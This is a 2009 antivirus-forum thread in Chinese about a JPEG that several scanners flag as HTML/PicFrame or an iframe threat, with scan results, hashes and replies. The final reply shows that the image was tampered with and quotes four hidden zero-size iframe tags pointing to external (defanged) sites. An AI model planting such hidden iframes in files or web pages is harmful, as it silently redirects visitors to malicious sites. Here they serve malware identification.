查看: 3636|回复: 5
收起左侧

[可疑文件] 空间里的一个东东

[复制链接]
江湖的fans
发表于 2009-4-8 21:26:21 | 显示全部楼层 |阅读模式
文件 zhongyi_20070627001_1_.rar 接收于 2009.04.08 15:20:51 (CET)
反病毒引擎版本最后更新扫描结果
a-squared4.0.0.1012009.04.08-
AhnLab-V35.0.0.22009.04.08-
AntiVir7.9.0.1382009.04.08HTML/PicFrame.Gen
Antiy-AVL2.0.3.12009.04.08-
Authentium5.1.2.42009.04.08HTML/IFrame
Avast4.8.1335.02009.04.07HTML:Iframe-gen
AVG8.5.0.2852009.04.08-
BitDefender7.22009.04.08-
CAT-QuickHeal10.002009.04.08-
ClamAV0.94.12009.04.08-
Comodo11052009.04.08-
DrWeb4.44.0.091702009.04.08-
eSafe7.0.17.02009.04.07-
eTrust-Vet31.6.64442009.04.08-
F-Prot4.4.4.562009.04.08HTML/IFrame
F-Secure8.0.14470.02009.04.08-
Fortinet3.117.0.02009.04.08-
GData192009.04.08HTML:Iframe-gen
IkarusT3.1.1.49.02009.04.08-
K7AntiVirus7.10.6952009.04.07-
Kaspersky7.0.0.1252009.04.08-
McAfee55772009.04.07Suspicious IFrame.d
McAfee+Artemis55772009.04.07Suspicious IFrame.d
McAfee-GW-Edition6.7.62009.04.08Script.PicFrame.Gen
Microsoft1.45022009.04.08-
NOD3239942009.04.07-
Norman6.00.062009.04.08-
nProtect2009.1.8.02009.04.08-
Panda10.0.0.142009.04.07-
PCTools4.4.2.02009.04.08-
Prevx1V22009.04.08-
Rising21.24.22.002009.04.08-
Sophos4.40.02009.04.08-
Sunbelt3.2.1858.22009.04.08-
Symantec1.4.4.122009.04.08-
TheHacker6.3.4.0.3032009.04.08-
TrendMicro8.700.0.10042009.04.08HTML_IFRAME.AZ
VBA323.12.10.22009.04.08-
ViRobot2009.4.7.16842009.04.08-
VirusBuster4.6.5.02009.04.07-

附加信息
File size: 4478 bytes
MD5...: 8d3bb57b2197096e9d10f460ff613861
SHA1..: 9e97f51e8a9c0dece19ae0f0568c5b9f58776825
SHA256: 1896b24bfa487f05f2f78479ce1125346a0677df981b3611c8e63cd811770f23
SHA512: 4824bf00e6445c95524a49bac6dcf6e70392a4d30f70f8f31f8e74f0cfb0891d<BR>e5ca852b891f07b4c34d58e3c2659be3a35078c582b1bcec7c686d71ae03bec8
ssdeep: 96:dA7BP0tuHXpNWCGXiO8jjjcfS6btijREmnPQs:da0t+psNXiO8j9bbnD<BR>
PEiD..: -
TrID..: File type identification<BR>RAR Archive (83.3%)<BR>REALbasic Project (16.6%)
PEInfo: -
RDS...: NSRL Reference Data Set<BR>-
packers (Authentium): appended
packers (F-Prot): appended



今天刚刚安装了红伞  打开空间就报毒了

一个图片而已     帮忙分析下     估计是误报了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Palkia
发表于 2009-4-8 21:30:58 | 显示全部楼层
zhongyi_20070627001[1].jpg      --------      未知
wrq
发表于 2009-4-8 22:02:29 | 显示全部楼层
Warning

--------------------------------------------------------------------------------

In order not to compromise your security, this page will not be accessed


A virus or unwanted program has been detected
in the HTTP data on the requested page.

--------------------------------------------------------------------------------

Requested URL: http://bbs.kafan.cn/attachment.p ... cf&t=1239199297
Information Contains recognition pattern of the HTML/PicFrame.Gen HTML script virus


--------------------------------------------------------------------------------

Generated by AntiVir WebGuard 9.0.3.0, AVE 8.2.0.138, VDF 7.1.3.27
写得很清楚
BING126
头像被屏蔽
发表于 2009-4-8 22:17:13 | 显示全部楼层
可能是误报。。 只是图片而已  发现没异常
Sebastian
发表于 2009-4-9 06:52:08 | 显示全部楼层
D:\kafan\zhongyi_20070627001[1].rar/zhongyi_20070627001[1].jpg         已检测: HTML.PicFrame!IK
残缺的唯美
发表于 2009-4-9 07:12:22 | 显示全部楼层
图片被修改  最后被添加网站
<iframe src="hxxp://www.zzpw.org/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://www.car122.com/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://hldrc.com/defaul.htm" width=0 height=0></iframe>
<iframe src="hxxp://www.szsic.com.cn/defaul.htm" width=0 height=0></iframe>
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-23 17:35 , Processed in 0.258573 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表